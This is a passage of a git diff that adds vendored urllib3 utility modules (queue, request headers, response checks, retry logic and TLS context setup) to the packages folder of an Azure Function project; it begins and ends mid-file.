ssl_context.load_default_certs() + + return ssl_context diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/queue.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/queue.py new file mode 100644 index 0000000..e617560 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/queue.py @@ -0,0 +1,22 @@ +import collections + +from ..packages import six +from ..packages.six.moves import queue + +if six.PY2: + # Queue is imported for side effects on MS Windows. See issue #229. + import Queue as _unused_module_Queue # noqa: F401 + + +class LifoQueue(queue.Queue): + def _init(self, _): + self.queue = collections.deque() + + def _qsize(self, len=len): + return len(self.queue) + + def _put(self, item): + self.queue.append(item) + + def _get(self): + return self.queue.pop() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/request.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/request.py new file mode 100644 index 0000000..eadc32d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/request.py @@ -0,0 +1,146 @@ +from __future__ import absolute_import + +from base64 import b64encode + +from ..exceptions import UnrewindableBodyError +from ..packages.six import b, integer_types + +# Pass as a value within ``headers`` to skip +# emitting some HTTP headers that are added automatically. +# The only headers that are supported are ``Accept-Encoding``, +# ``Host``, and ``User-Agent``. +SKIP_HEADER = "@@@SKIP_HEADER@@@" +SKIPPABLE_HEADERS = frozenset(["accept-encoding", "host", "user-agent"]) + +ACCEPT_ENCODING = "gzip,deflate" +try: + try: + import brotlicffi as _unused_module_brotli # noqa: F401 + except ImportError: + import brotli as _unused_module_brotli # noqa: F401 +except ImportError: + pass +else: + ACCEPT_ENCODING += ",br" + +_FAILEDTELL = object() + + +def make_headers( + keep_alive=None, + accept_encoding=None, + user_agent=None, + basic_auth=None, + proxy_basic_auth=None, + disable_cache=None, +): + """ + Shortcuts for generating request headers. + + :param keep_alive: + If ``True``, adds 'connection: keep-alive' header. + + :param accept_encoding: + Can be a boolean, list, or string. + ``True`` translates to 'gzip,deflate'. + List will get joined by comma. + String will be used as provided. + + :param user_agent: + String representing the user-agent you want, such as + "python-urllib3/0.6" + + :param basic_auth: + Colon-separated username:password string for 'authorization: basic ...' + auth header. + + :param proxy_basic_auth: + Colon-separated username:password string for 'proxy-authorization: basic ...' + auth header. + + :param disable_cache: + If ``True``, adds 'cache-control: no-cache' header. + + Example:: + + >>> make_headers(keep_alive=True, user_agent="Batman/1.0") + {'connection': 'keep-alive', 'user-agent': 'Batman/1.0'} + >>> make_headers(accept_encoding=True) + {'accept-encoding': 'gzip,deflate'} + """ + headers = {} + if accept_encoding: + if isinstance(accept_encoding, str): + pass + elif isinstance(accept_encoding, list): + accept_encoding = ",".join(accept_encoding) + else: + accept_encoding = ACCEPT_ENCODING + headers["accept-encoding"] = accept_encoding + + if user_agent: + headers["user-agent"] = user_agent + + if keep_alive: + headers["connection"] = "keep-alive" + + if basic_auth: + headers["authorization"] = "Basic " + b64encode(b(basic_auth)).decode("utf-8") + + if proxy_basic_auth: + headers["proxy-authorization"] = "Basic " + b64encode( + b(proxy_basic_auth) + ).decode("utf-8") + + if disable_cache: + headers["cache-control"] = "no-cache" + + return headers + + +def set_file_position(body, pos): + """ + If a position is provided, move file to that point. + Otherwise, we'll attempt to record a position for future use. + """ + if pos is not None: + rewind_body(body, pos) + elif getattr(body, "tell", None) is not None: + try: + pos = body.tell() + except (IOError, OSError): + # This differentiates from None, allowing us to catch + # a failed `tell()` later when trying to rewind the body. + pos = _FAILEDTELL + + return pos + + +def rewind_body(body, body_pos): + """ + Attempt to rewind body to a certain position. + Primarily used for request redirects and retries. + + :param body: + File-like object that supports seek. + + :param int pos: + Position to seek to in file. + """ + body_seek = getattr(body, "seek", None) + if body_seek is not None and isinstance(body_pos, integer_types): + try: + body_seek(body_pos) + except (IOError, OSError): + raise UnrewindableBodyError( + "An error occurred when rewinding request body for redirect/retry." + ) + elif body_pos is _FAILEDTELL: + raise UnrewindableBodyError( + "Unable to record file position for rewinding " + "request body during a redirect/retry." + ) + else: + raise ValueError( + "body_pos must be of type integer, instead it was %s." % type(body_pos) + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/response.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/response.py new file mode 100644 index 0000000..487103a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/response.py @@ -0,0 +1,107 @@ +from __future__ import absolute_import + +from email.errors import MultipartInvariantViolationDefect, StartBoundaryNotFoundDefect + +from ..exceptions import HeaderParsingError +from ..packages.six.moves import http_client as httplib + + +def is_fp_closed(obj): + """ + Checks whether a given file-like object is closed. + + :param obj: + The file-like object to check. + """ + + try: + # Check `isclosed()` first, in case Python3 doesn't set `closed`. + # GH Issue #928 + return obj.isclosed() + except AttributeError: + pass + + try: + # Check via the official file-like-object way. + return obj.closed + except AttributeError: + pass + + try: + # Check if the object is a container for another file-like object that + # gets released on exhaustion (e.g. HTTPResponse). + return obj.fp is None + except AttributeError: + pass + + raise ValueError("Unable to determine whether fp is closed.") + + +def assert_header_parsing(headers): + """ + Asserts whether all headers have been successfully parsed. + Extracts encountered errors from the result of parsing headers. + + Only works on Python 3. + + :param http.client.HTTPMessage headers: Headers to verify. + + :raises urllib3.exceptions.HeaderParsingError: + If parsing errors are found. + """ + + # This will fail silently if we pass in the wrong kind of parameter. + # To make debugging easier add an explicit check. + if not isinstance(headers, httplib.HTTPMessage): + raise TypeError("expected httplib.Message, got {0}.".format(type(headers))) + + defects = getattr(headers, "defects", None) + get_payload = getattr(headers, "get_payload", None) + + unparsed_data = None + if get_payload: + # get_payload is actually email.message.Message.get_payload; + # we're only interested in the result if it's not a multipart message + if not headers.is_multipart(): + payload = get_payload() + + if isinstance(payload, (bytes, str)): + unparsed_data = payload + if defects: + # httplib is assuming a response body is available + # when parsing headers even when httplib only sends + # header data to parse_headers() This results in + # defects on multipart responses in particular. + # See: https://github.com/urllib3/urllib3/issues/800 + + # So we ignore the following defects: + # - StartBoundaryNotFoundDefect: + # The claimed start boundary was never found. + # - MultipartInvariantViolationDefect: + # A message claimed to be a multipart but no subparts were found. + defects = [ + defect + for defect in defects + if not isinstance( + defect, (StartBoundaryNotFoundDefect, MultipartInvariantViolationDefect) + ) + ] + + if defects or unparsed_data: + raise HeaderParsingError(defects=defects, unparsed_data=unparsed_data) + + +def is_response_to_head(response): + """ + Checks whether the request of a response has been a HEAD-request. + Handles the quirks of AppEngine. + + :param http.client.HTTPResponse response: + Response to check if the originating request + used 'HEAD' as a method. + """ + # FIXME: Can we do this somehow without accessing private httplib _method? + method = response._method + if isinstance(method, int): # Platform-specific: Appengine + return method == 3 + return method.upper() == "HEAD" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/retry.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/retry.py new file mode 100644 index 0000000..b44c60a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/retry.py @@ -0,0 +1,620 @@ +from __future__ import absolute_import + +import email +import logging +import re +import time +import warnings +from collections import namedtuple +from itertools import takewhile + +from ..exceptions import ( + ConnectTimeoutError, + InvalidHeader, + MaxRetryError, + ProtocolError, + ProxyError, + ReadTimeoutError, + ResponseError, +) +from ..packages import six + +log = logging.getLogger(__name__) + + +# Data structure for representing the metadata of requests that result in a retry. +RequestHistory = namedtuple( + "RequestHistory", ["method", "url", "error", "status", "redirect_location"] +) + + +# TODO: In v2 we can remove this sentinel and metaclass with deprecated options. +_Default = object() + + +class _RetryMeta(type): + @property + def DEFAULT_METHOD_WHITELIST(cls): + warnings.warn( + "Using 'Retry.DEFAULT_METHOD_WHITELIST' is deprecated and " + "will be removed in v2.0. Use 'Retry.DEFAULT_ALLOWED_METHODS' instead", + DeprecationWarning, + ) + return cls.DEFAULT_ALLOWED_METHODS + + @DEFAULT_METHOD_WHITELIST.setter + def DEFAULT_METHOD_WHITELIST(cls, value): + warnings.warn( + "Using 'Retry.DEFAULT_METHOD_WHITELIST' is deprecated and " + "will be removed in v2.0. Use 'Retry.DEFAULT_ALLOWED_METHODS' instead", + DeprecationWarning, + ) + cls.DEFAULT_ALLOWED_METHODS = value + + @property + def DEFAULT_REDIRECT_HEADERS_BLACKLIST(cls): + warnings.warn( + "Using 'Retry.DEFAULT_REDIRECT_HEADERS_BLACKLIST' is deprecated and " + "will be removed in v2.0. Use 'Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT' instead", + DeprecationWarning, + ) + return cls.DEFAULT_REMOVE_HEADERS_ON_REDIRECT + + @DEFAULT_REDIRECT_HEADERS_BLACKLIST.setter + def DEFAULT_REDIRECT_HEADERS_BLACKLIST(cls, value): + warnings.warn( + "Using 'Retry.DEFAULT_REDIRECT_HEADERS_BLACKLIST' is deprecated and " + "will be removed in v2.0. Use 'Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT' instead", + DeprecationWarning, + ) + cls.DEFAULT_REMOVE_HEADERS_ON_REDIRECT = value + + @property + def BACKOFF_MAX(cls): + warnings.warn( + "Using 'Retry.BACKOFF_MAX' is deprecated and " + "will be removed in v2.0. Use 'Retry.DEFAULT_BACKOFF_MAX' instead", + DeprecationWarning, + ) + return cls.DEFAULT_BACKOFF_MAX + + @BACKOFF_MAX.setter + def BACKOFF_MAX(cls, value): + warnings.warn( + "Using 'Retry.BACKOFF_MAX' is deprecated and " + "will be removed in v2.0. Use 'Retry.DEFAULT_BACKOFF_MAX' instead", + DeprecationWarning, + ) + cls.DEFAULT_BACKOFF_MAX = value + + +@six.add_metaclass(_RetryMeta) +class Retry(object): + """Retry configuration. + + Each retry attempt will create a new Retry object with updated values, so + they can be safely reused. + + Retries can be defined as a default for a pool:: + + retries = Retry(connect=5, read=2, redirect=5) + http = PoolManager(retries=retries) + response = http.request('GET', 'http://example.com/') + + Or per-request (which overrides the default for the pool):: + + response = http.request('GET', 'http://example.com/', retries=Retry(10)) + + Retries can be disabled by passing ``False``:: + + response = http.request('GET', 'http://example.com/', retries=False) + + Errors will be wrapped in :class:`~urllib3.exceptions.MaxRetryError` unless + retries are disabled, in which case the causing exception will be raised. + + :param int total: + Total number of retries to allow. Takes precedence over other counts. + + Set to ``None`` to remove this constraint and fall back on other + counts. + + Set to ``0`` to fail on the first retry. + + Set to ``False`` to disable and imply ``raise_on_redirect=False``. + + :param int connect: + How many connection-related errors to retry on. + + These are errors raised before the request is sent to the remote server, + which we assume has not triggered the server to process the request. + + Set to ``0`` to fail on the first retry of this type. + + :param int read: + How many times to retry on read errors. + + These errors are raised after the request was sent to the server, so the + request may have side-effects. + + Set to ``0`` to fail on the first retry of this type. + + :param int redirect: + How many redirects to perform. Limit this to avoid infinite redirect + loops. + + A redirect is a HTTP response with a status code 301, 302, 303, 307 or + 308. + + Set to ``0`` to fail on the first retry of this type. + + Set to ``False`` to disable and imply ``raise_on_redirect=False``. + + :param int status: + How many times to retry on bad status codes. + + These are retries made on responses, where status code matches + ``status_forcelist``. + + Set to ``0`` to fail on the first retry of this type. + + :param int other: + How many times to retry on other errors. + + Other errors are errors that are not connect, read, redirect or status errors. + These errors might be raised after the request was sent to the server, so the + request might have side-effects. + + Set to ``0`` to fail on the first retry of this type. + + If ``total`` is not set, it's a good idea to set this to 0 to account + for unexpected edge cases and avoid infinite retry loops. + + :param iterable allowed_methods: + Set of uppercased HTTP method verbs that we should retry on. + + By default, we only retry on methods which are considered to be + idempotent (multiple requests with the same parameters end with the + same state). See :attr:`Retry.DEFAULT_ALLOWED_METHODS`. + + Set to a ``False`` value to retry on any verb. + + .. warning:: + + Previously this parameter was named ``method_whitelist``, that + usage is deprecated in v1.26.0 and will be removed in v2.0. + + :param iterable status_forcelist: + A set of integer HTTP status codes that we should force a retry on. + A retry is initiated if the request method is in ``allowed_methods`` + and the response status code is in ``status_forcelist``. + + By default, this is disabled with ``None``. + + :param float backoff_factor: + A backoff factor to apply between attempts after the second try + (most errors are resolved immediately by a second try without a + delay). urllib3 will sleep for:: + + {backoff factor} * (2 ** ({number of total retries} - 1)) + + seconds. If the backoff_factor is 0.1, then :func:`.sleep` will sleep + for [0.0s, 0.2s, 0.4s, ...] between retries. It will never be longer + than :attr:`Retry.DEFAULT_BACKOFF_MAX`. + + By default, backoff is disabled (set to 0). + + :param bool raise_on_redirect: Whether, if the number of redirects is + exhausted, to raise a MaxRetryError, or to return a response with a + response code in the 3xx range. + + :param bool raise_on_status: Similar meaning to ``raise_on_redirect``: + whether we should raise an exception, or return a response, + if status falls in ``status_forcelist`` range and retries have + been exhausted. + + :param tuple history: The history of the request encountered during + each call to :meth:`~Retry.increment`. The list is in the order + the requests occurred. Each list item is of class :class:`RequestHistory`. + + :param bool respect_retry_after_header: + Whether to respect Retry-After header on status codes defined as + :attr:`Retry.RETRY_AFTER_STATUS_CODES` or not. + + :param iterable remove_headers_on_redirect: + Sequence of headers to remove from the request when a response + indicating a redirect is returned before firing off the redirected + request. + """ + + #: Default methods to be used for ``allowed_methods`` + DEFAULT_ALLOWED_METHODS = frozenset( + ["HEAD", "GET", "PUT", "DELETE", "OPTIONS", "TRACE"] + ) + + #: Default status codes to be used for ``status_forcelist`` + RETRY_AFTER_STATUS_CODES = frozenset([413, 429, 503]) + + #: Default headers to be used for ``remove_headers_on_redirect`` + DEFAULT_REMOVE_HEADERS_ON_REDIRECT = frozenset(["Authorization"]) + + #: Maximum backoff time. + DEFAULT_BACKOFF_MAX = 120 + + def __init__( + self, + total=10, + connect=None, + read=None, + redirect=None, + status=None, + other=None, + allowed_methods=_Default, + status_forcelist=None, + backoff_factor=0, + raise_on_redirect=True, + raise_on_status=True, + history=None, + respect_retry_after_header=True, + remove_headers_on_redirect=_Default, + # TODO: Deprecated, remove in v2.0 + method_whitelist=_Default, + ): + + if method_whitelist is not _Default: + if allowed_methods is not _Default: + raise ValueError( + "Using both 'allowed_methods' and " + "'method_whitelist' together is not allowed. " + "Instead only use 'allowed_methods'" + ) + warnings.warn( + "Using 'method_whitelist' with Retry is deprecated and " + "will be removed in v2.0. Use 'allowed_methods' instead", + DeprecationWarning, + stacklevel=2, + ) + allowed_methods = method_whitelist + if allowed_methods is _Default: + allowed_methods = self.DEFAULT_ALLOWED_METHODS + if remove_headers_on_redirect is _Default: + remove_headers_on_redirect = self.DEFAULT_REMOVE_HEADERS_ON_REDIRECT + + self.total = total + self.connect = connect + self.read = read + self.status = status + self.other = other + + if redirect is False or total is False: + redirect = 0 + raise_on_redirect = False + + self.redirect = redirect + self.status_forcelist = status_forcelist or set() + self.allowed_methods = allowed_methods + self.backoff_factor = backoff_factor + self.raise_on_redirect = raise_on_redirect + self.raise_on_status = raise_on_status + self.history = history or tuple() + self.respect_retry_after_header = respect_retry_after_header + self.remove_headers_on_redirect = frozenset( + [h.lower() for h in remove_headers_on_redirect] + ) + + def new(self, **kw): + params = dict( + total=self.total, + connect=self.connect, + read=self.read, + redirect=self.redirect, + status=self.status, + other=self.other, + status_forcelist=self.status_forcelist, + backoff_factor=self.backoff_factor, + raise_on_redirect=self.raise_on_redirect, + raise_on_status=self.raise_on_status, + history=self.history, + remove_headers_on_redirect=self.remove_headers_on_redirect, + respect_retry_after_header=self.respect_retry_after_header, + ) + + # TODO: If already given in **kw we use what's given to us + # If not given we need to figure out what to pass. We decide + # based on whether our class has the 'method_whitelist' property + # and if so we pass the deprecated 'method_whitelist' otherwise + # we use 'allowed_methods'. Remove in v2.0 + if "method_whitelist" not in kw and "allowed_methods" not in kw: + if "method_whitelist" in self.__dict__: + warnings.warn( + "Using 'method_whitelist' with Retry is deprecated and " + "will be removed in v2.0. Use 'allowed_methods' instead", + DeprecationWarning, + ) + params["method_whitelist"] = self.allowed_methods + else: + params["allowed_methods"] = self.allowed_methods + + params.update(kw) + return type(self)(**params) + + @classmethod + def from_int(cls, retries, redirect=True, default=None): + """Backwards-compatibility for the old retries format.""" + if retries is None: + retries = default if default is not None else cls.DEFAULT + + if isinstance(retries, Retry): + return retries + + redirect = bool(redirect) and None + new_retries = cls(retries, redirect=redirect) + log.debug("Converted retries value: %r -> %r", retries, new_retries) + return new_retries + + def get_backoff_time(self): + """Formula for computing the current backoff + + :rtype: float + """ + # We want to consider only the last consecutive errors sequence (Ignore redirects). + consecutive_errors_len = len( + list( + takewhile(lambda x: x.redirect_location is None, reversed(self.history)) + ) + ) + if consecutive_errors_len <= 1: + return 0 + + backoff_value = self.backoff_factor * (2 ** (consecutive_errors_len - 1)) + return min(self.DEFAULT_BACKOFF_MAX, backoff_value) + + def parse_retry_after(self, retry_after): + # Whitespace: https://tools.ietf.org/html/rfc7230#section-3.2.4 + if re.match(r"^\s*[0-9]+\s*$", retry_after): + seconds = int(retry_after) + else: + retry_date_tuple = email.utils.parsedate_tz(retry_after) + if retry_date_tuple is None: + raise InvalidHeader("Invalid Retry-After header: %s" % retry_after) + if retry_date_tuple[9] is None: # Python 2 + # Assume UTC if no timezone was specified + # On Python2.7, parsedate_tz returns None for a timezone offset + # instead of 0 if no timezone is given, where mktime_tz treats + # a None timezone offset as local time. + retry_date_tuple = retry_date_tuple[:9] + (0,) + retry_date_tuple[10:] + + retry_date = email.utils.mktime_tz(retry_date_tuple) + seconds = retry_date - time.time() + + if seconds < 0: + seconds = 0 + + return seconds + + def get_retry_after(self, response): + """Get the value of Retry-After in seconds.""" + + retry_after = response.getheader("Retry-After") + + if retry_after is None: + return None + + return self.parse_retry_after(retry_after) + + def sleep_for_retry(self, response=None): + retry_after = self.get_retry_after(response) + if retry_after: + time.sleep(retry_after) + return True + + return False + + def _sleep_backoff(self): + backoff = self.get_backoff_time() + if backoff <= 0: + return + time.sleep(backoff) + + def sleep(self, response=None): + """Sleep between retry attempts. + + This method will respect a server's ``Retry-After`` response header + and sleep the duration of the time requested. If that is not present, it + will use an exponential backoff. By default, the backoff factor is 0 and + this method will return immediately. + """ + + if self.respect_retry_after_header and response: + slept = self.sleep_for_retry(response) + if slept: + return + + self._sleep_backoff() + + def _is_connection_error(self, err): + """Errors when we're fairly sure that the server did not receive the + request, so it should be safe to retry. + """ + if isinstance(err, ProxyError): + err = err.original_error + return isinstance(err, ConnectTimeoutError) + + def _is_read_error(self, err): + """Errors that occur after the request has been started, so we should + assume that the server began processing it. + """ + return isinstance(err, (ReadTimeoutError, ProtocolError)) + + def _is_method_retryable(self, method): + """Checks if a given HTTP method should be retried upon, depending if + it is included in the allowed_methods + """ + # TODO: For now favor if the Retry implementation sets its own method_whitelist + # property outside of our constructor to avoid breaking custom implementations. + if "method_whitelist" in self.__dict__: + warnings.warn( + "Using 'method_whitelist' with Retry is deprecated and " + "will be removed in v2.0. Use 'allowed_methods' instead", + DeprecationWarning, + ) + allowed_methods = self.method_whitelist + else: + allowed_methods = self.allowed_methods + + if allowed_methods and method.upper() not in allowed_methods: + return False + return True + + def is_retry(self, method, status_code, has_retry_after=False): + """Is this method/status code retryable? (Based on allowlists and control + variables such as the number of total retries to allow, whether to + respect the Retry-After header, whether this header is present, and + whether the returned status code is on the list of status codes to + be retried upon on the presence of the aforementioned header) + """ + if not self._is_method_retryable(method): + return False + + if self.status_forcelist and status_code in self.status_forcelist: + return True + + return ( + self.total + and self.respect_retry_after_header + and has_retry_after + and (status_code in self.RETRY_AFTER_STATUS_CODES) + ) + + def is_exhausted(self): + """Are we out of retries?""" + retry_counts = ( + self.total, + self.connect, + self.read, + self.redirect, + self.status, + self.other, + ) + retry_counts = list(filter(None, retry_counts)) + if not retry_counts: + return False + + return min(retry_counts) < 0 + + def increment( + self, + method=None, + url=None, + response=None, + error=None, + _pool=None, + _stacktrace=None, + ): + """Return a new Retry object with incremented retry counters. + + :param response: A response object, or None, if the server did not + return a response. + :type response: :class:`~urllib3.response.HTTPResponse` + :param Exception error: An error encountered during the request, or + None if the response was received successfully. + + :return: A new ``Retry`` object. + """ + if self.total is False and error: + # Disabled, indicate to re-raise the error. + raise six.reraise(type(error), error, _stacktrace) + + total = self.total + if total is not None: + total -= 1 + + connect = self.connect + read = self.read + redirect = self.redirect + status_count = self.status + other = self.other + cause = "unknown" + status = None + redirect_location = None + + if error and self._is_connection_error(error): + # Connect retry? + if connect is False: + raise six.reraise(type(error), error, _stacktrace) + elif connect is not None: + connect -= 1 + + elif error and self._is_read_error(error): + # Read retry? + if read is False or not self._is_method_retryable(method): + raise six.reraise(type(error), error, _stacktrace) + elif read is not None: + read -= 1 + + elif error: + # Other retry? + if other is not None: + other -= 1 + + elif response and response.get_redirect_location(): + # Redirect retry? + if redirect is not None: + redirect -= 1 + cause = "too many redirects" + redirect_location = response.get_redirect_location() + status = response.status + + else: + # Incrementing because of a server error like a 500 in + # status_forcelist and the given method is in the allowed_methods + cause = ResponseError.GENERIC_ERROR + if response and response.status: + if status_count is not None: + status_count -= 1 + cause = ResponseError.SPECIFIC_ERROR.format(status_code=response.status) + status = response.status + + history = self.history + ( + RequestHistory(method, url, error, status, redirect_location), + ) + + new_retry = self.new( + total=total, + connect=connect, + read=read, + redirect=redirect, + status=status_count, + other=other, + history=history, + ) + + if new_retry.is_exhausted(): + raise MaxRetryError(_pool, url, error or ResponseError(cause)) + + log.debug("Incremented Retry for (url='%s'): %r", url, new_retry) + + return new_retry + + def __repr__(self): + return ( + "{cls.__name__}(total={self.total}, connect={self.connect}, " + "read={self.read}, redirect={self.redirect}, status={self.status})" + ).format(cls=type(self), self=self) + + def __getattr__(self, item): + if item == "method_whitelist": + # TODO: Remove this deprecated alias in v2.0 + warnings.warn( + "Using 'method_whitelist' with Retry is deprecated and " + "will be removed in v2.0. Use 'allowed_methods' instead", + DeprecationWarning, + ) + return self.allowed_methods + try: + return getattr(super(Retry, self), item) + except AttributeError: + return getattr(Retry, item) + + +# For backwards compatibility (equivalent to pre-v1.9): +Retry.DEFAULT = Retry(3) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssl_.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssl_.py new file mode 100644 index 0000000..8577a08 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssl_.py @@ -0,0 +1,495 @@ +from __future__ import absolute_import + +import hmac +import os +import sys +import warnings +from binascii import hexlify, unhexlify +from hashlib import md5, sha1, sha256 + +from ..exceptions import ( + InsecurePlatformWarning, + ProxySchemeUnsupported, + SNIMissingWarning, + SSLError, +) +from ..packages import six +from .url import BRACELESS_IPV6_ADDRZ_RE, IPV4_RE + +SSLContext = None +SSLTransport = None +HAS_SNI = False +IS_PYOPENSSL = False +IS_SECURETRANSPORT = False +ALPN_PROTOCOLS = ["http/1.1"] + +# Maps the length of a digest to a possible hash function producing this digest +HASHFUNC_MAP = {32: md5, 40: sha1, 64: sha256} + + +def _const_compare_digest_backport(a, b): + """ + Compare two digests of equal length in constant time. + + The digests must be of type str/bytes. + Returns True if the digests match, and False otherwise. + """ + result = abs(len(a) - len(b)) + for left, right in zip(bytearray(a), bytearray(b)): + result |= left ^ right + return result == 0 + + +_const_compare_digest = getattr(hmac, "compare_digest", _const_compare_digest_backport) + +try: # Test for SSL features + import ssl + from ssl import CERT_REQUIRED, wrap_socket +except ImportError: + pass + +try: + from ssl import HAS_SNI # Has SNI? +except ImportError: + pass + +try: + from .ssltransport import SSLTransport +except ImportError: + pass + + +try: # Platform-specific: Python 3.6 + from ssl import PROTOCOL_TLS + + PROTOCOL_SSLv23 = PROTOCOL_TLS +except ImportError: + try: + from ssl import PROTOCOL_SSLv23 as PROTOCOL_TLS + + PROTOCOL_SSLv23 = PROTOCOL_TLS + except ImportError: + PROTOCOL_SSLv23 = PROTOCOL_TLS = 2 + +try: + from ssl import PROTOCOL_TLS_CLIENT +except ImportError: + PROTOCOL_TLS_CLIENT = PROTOCOL_TLS + + +try: + from ssl import OP_NO_COMPRESSION, OP_NO_SSLv2, OP_NO_SSLv3 +except ImportError: + OP_NO_SSLv2, OP_NO_SSLv3 = 0x1000000, 0x2000000 + OP_NO_COMPRESSION = 0x20000 + + +try: # OP_NO_TICKET was added in Python 3.6 + from ssl import OP_NO_TICKET +except ImportError: + OP_NO_TICKET = 0x4000 + + +# A secure default. +# Sources for more information on TLS ciphers: +# +# - https://wiki.mozilla.org/Security/Server_Side_TLS +# - https://www.ssllabs.com/projects/best-practices/index.html +# - https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/ +# +# The general intent is: +# - prefer cipher suites that offer perfect forward secrecy (DHE/ECDHE), +# - prefer ECDHE over DHE for better performance, +# - prefer any AES-GCM and ChaCha20 over any AES-CBC for better performance and +# security, +# - prefer AES-GCM over ChaCha20 because hardware-accelerated AES is common, +# - disable NULL authentication, MD5 MACs, DSS, and other +# insecure ciphers for security reasons. +# - NOTE: TLS 1.3 cipher suites are managed through a different interface +# not exposed by CPython (yet!) and are enabled by default if they're available. +DEFAULT_CIPHERS = ":".join( + [ + "ECDHE+AESGCM", + "ECDHE+CHACHA20", + "DHE+AESGCM", + "DHE+CHACHA20", + "ECDH+AESGCM", + "DH+AESGCM", + "ECDH+AES", + "DH+AES", + "RSA+AESGCM", + "RSA+AES", + "!aNULL", + "!eNULL", + "!MD5", + "!DSS", + ] +) + +try: + from ssl import SSLContext # Modern SSL? +except ImportError: + + class SSLContext(object): # Platform-specific: Python 2 + def __init__(self, protocol_version): + self.protocol = protocol_version + # Use default values from a real SSLContext + self.check_hostname = False + self.verify_mode = ssl.CERT_NONE + self.ca_certs = None + self.options = 0 + self.certfile = None + self.keyfile = None + self.ciphers = None + + def load_cert_chain(self, certfile, keyfile): + self.certfile = certfile + self.keyfile = keyfile + + def load_verify_locations(self, cafile=None, capath=None, cadata=None): + self.ca_certs = cafile + + if capath is not None: + raise SSLError("CA directories not supported in older Pythons") + + if cadata is not None: + raise SSLError("CA data not supported in older Pythons") + + def set_ciphers(self, cipher_suite): + self.ciphers = cipher_suite + + def wrap_socket(self, socket, server_hostname=None, server_side=False): + warnings.warn( + "A true SSLContext object is not available. This prevents " + "urllib3 from configuring SSL appropriately and may cause " + "certain SSL connections to fail. You can upgrade to a newer " + "version of Python to solve this. For more information, see " + "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" + "#ssl-warnings", + InsecurePlatformWarning, + ) + kwargs = { + "keyfile": self.keyfile, + "certfile": self.certfile, + "ca_certs": self.ca_certs, + "cert_reqs": self.verify_mode, + "ssl_version": self.protocol, + "server_side": server_side, + } + return wrap_socket(socket, ciphers=self.ciphers, **kwargs) + + +def assert_fingerprint(cert, fingerprint): + """ + Checks if given fingerprint matches the supplied certificate. + + :param cert: + Certificate as bytes object. + :param fingerprint: + Fingerprint as string of hexdigits, can be interspersed by colons. + """ + + fingerprint = fingerprint.replace(":", "").lower() + digest_length = len(fingerprint) + hashfunc = HASHFUNC_MAP.get(digest_length) + if not hashfunc: + raise SSLError("Fingerprint of invalid length: {0}".format(fingerprint)) + + # We need encode() here for py32; works on py2 and p33. + fingerprint_bytes = unhexlify(fingerprint.encode()) + + cert_digest = hashfunc(cert).digest() + + if not _const_compare_digest(cert_digest, fingerprint_bytes): + raise SSLError( + 'Fingerprints did not match. Expected "{0}", got "{1}".'.format( + fingerprint, hexlify(cert_digest) + ) + ) + + +def resolve_cert_reqs(candidate): + """ + Resolves the argument to a numeric constant, which can be passed to + the wrap_socket function/method from the ssl module. + Defaults to :data:`ssl.CERT_REQUIRED`. + If given a string it is assumed to be the name of the constant in the + :mod:`ssl` module or its abbreviation. + (So you can specify `REQUIRED` instead of `CERT_REQUIRED`. + If it's neither `None` nor a string we assume it is already the numeric + constant which can directly be passed to wrap_socket. + """ + if candidate is None: + return CERT_REQUIRED + + if isinstance(candidate, str): + res = getattr(ssl, candidate, None) + if res is None: + res = getattr(ssl, "CERT_" + candidate) + return res + + return candidate + + +def resolve_ssl_version(candidate): + """ + like resolve_cert_reqs + """ + if candidate is None: + return PROTOCOL_TLS + + if isinstance(candidate, str): + res = getattr(ssl, candidate, None) + if res is None: + res = getattr(ssl, "PROTOCOL_" + candidate) + return res + + return candidate + + +def create_urllib3_context( + ssl_version=None, cert_reqs=None, options=None, ciphers=None +): + """All arguments have the same meaning as ``ssl_wrap_socket``. + + By default, this function does a lot of the same work that + ``ssl.create_default_context`` does on Python 3.4+. It: + + - Disables SSLv2, SSLv3, and compression + - Sets a restricted set of server ciphers + + If you wish to enable SSLv3, you can do:: + + from urllib3.util import ssl_ + context = ssl_.create_urllib3_context() + context.options &= ~ssl_.OP_NO_SSLv3 + + You can do the same to enable compression (substituting ``COMPRESSION`` + for ``SSLv3`` in the last line above). + + :param ssl_version: + The desired protocol version to use. This will default to + PROTOCOL_SSLv23 which will negotiate the highest protocol that both + the server and your installation of OpenSSL support. + :param cert_reqs: + Whether to require the certificate verification. This defaults to + ``ssl.CERT_REQUIRED``. + :param options: + Specific OpenSSL options. These default to ``ssl.OP_NO_SSLv2``, + ``ssl.OP_NO_SSLv3``, ``ssl.OP_NO_COMPRESSION``, and ``ssl.OP_NO_TICKET``. + :param ciphers: + Which cipher suites to allow the server to select. + :returns: + Constructed SSLContext object with specified options + :rtype: SSLContext + """ + # PROTOCOL_TLS is deprecated in Python 3.10 + if not ssl_version or ssl_version == PROTOCOL_TLS: + ssl_version = PROTOCOL_TLS_CLIENT + + context = SSLContext(ssl_version) + + context.set_ciphers(ciphers or DEFAULT_CIPHERS) + + # Setting the default here, as we may have no ssl module on import + cert_reqs = ssl.CERT_REQUIRED if cert_reqs is None else cert_reqs + + if options is None: + options = 0 + # SSLv2 is 